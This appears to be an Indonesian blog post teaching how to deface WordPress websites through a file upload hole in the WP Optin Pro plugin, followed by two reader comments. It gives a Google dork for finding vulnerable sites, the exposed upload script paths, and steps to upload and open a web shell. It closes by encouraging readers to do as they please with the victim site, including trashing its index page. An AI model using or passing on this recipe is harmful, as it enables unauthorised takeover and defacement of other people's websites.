Pada artikel kali ini saya akan share cara defece web yang berbasis wordpress dengan metode POC WP Optin Pro File Upload.
Bagi yang sering melakukan defece pasti sudah tidak asing lagi dengan POC WP Optin Pro
Google Dork = inurl:wp-content/uploads/svp/headerimage/
Explot = /wp-content/plugins/wp_optin_pro/media-uploads.php
/wp-content/plugins/wp_optin_pro/media-upload.php
/wp-content/plugins/wp_optin_pro/videofake-upload.php
Explot = /wp-content/plugins/wp_optin_pro/media-uploads.php
/wp-content/plugins/wp_optin_pro/media-upload.php
/wp-content/plugins/wp_optin_pro/videofake-upload.php
Langkah-Langkah
- Cari target menggunakan dork diatas.
- Masukan Exploit : Example http://www.target.com/wp-content/plugins/wp_optin_pro/media-uploads.php
- jika sudah masukan exploit pada url target seperti langkah 2 diatas maka akan muncul tampilan halaman upload seperti gambar berikut :
Bwowse dan upload shell anda - Jika sudah mengupload shellnya kemudian cari gambar seperti dibwah ini :
Ket : Gambar yang diatas adalah shell yang kita upload tadi - Langkah Selanjutnya klik kanan pada gambar/shell kemudian pilih "Copy Image Link Location" buka tab baru kemudian paste. Maka akan muncul halam tampilan shell kita seperti gambar di bawah ini :
Selanjutnya terserah anda mau diapain tuh targetnya, mau di ubrak abrik file index juga terserah anda. Pilihan ada ditangan anda
ijin sedot gan :-)
ReplyDelete:r
ReplyDelete